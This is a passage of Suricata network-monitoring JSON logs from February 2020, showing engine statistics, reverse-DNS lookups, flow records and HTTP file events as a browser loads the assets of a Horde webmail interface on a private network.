t_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:50.650903+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55832,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19892,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:53.000483+0000","flow_id":2032669216969740,"event_type":"flow","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:51.889868+0000","end":"2020-02-29T00:21:52.001579+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:55.000159+0000","event_type":"stats","stats":{"uptime":15267,"capture":{"kernel_packets":142248,"kernel_drops":0},"decoder":{"pkts":142254,"bytes":97728544,"invalid":196,"ipv4":140657,"ipv6":10,"ethernet":142254,"raw":0,"null":0,"sll":0,"tcp":135064,"udp":5382,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2919,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2935,"synack":2926,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2462,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2546}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2548,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:57.000181+0000","flow_id":1410057873142980,"event_type":"flow","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.275652+0000","end":"2020-02-29T00:21:56.384455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:57.000808+0000","flow_id":1686898580184385,"event_type":"flow","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.580929+0000","end":"2020-02-29T00:21:56.692104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:59.391250+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55048,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18473,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:59.699545+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085}} {"timestamp":"2020-02-29T00:27:02.000204+0000","event_type":"stats","stats":{"uptime":15274,"capture":{"kernel_packets":142262,"kernel_drops":0},"decoder":{"pkts":142279,"bytes":97739194,"invalid":196,"ipv4":140680,"ipv6":10,"ethernet":142279,"raw":0,"null":0,"sll":0,"tcp":135085,"udp":5384,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2920,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2936,"synack":2927,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1924,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2463,"failed_udp":116},"tx":{"http":5024,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2547}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9900,"memcap_state":0,"memcap_global":0},"http":{"memuse":86179,"memcap":0}}} {"timestamp":"2020-02-29T00:27:04.287799+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47025,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.298851+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51720,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45791,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:04.518331+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529}} {"timestamp":"2020-02-29T00:27:04.548359+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.556000+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:04.558855+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.559330+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:27:04.568875+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.569324+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:27:04.570867+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:27:04.572003+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.575006+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:27:04.582851+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.583567+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:27:04.581934+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.583273+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:27:04.584564+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53172,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:27:04.586989+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:27:04.588199+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53174,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:27:04.592501+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.592938+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:27:04.594190+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.594830+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:27:04.603692+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.603842+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.604106+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:27:04.609489+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:27:04.611348+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.611374+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":1}} 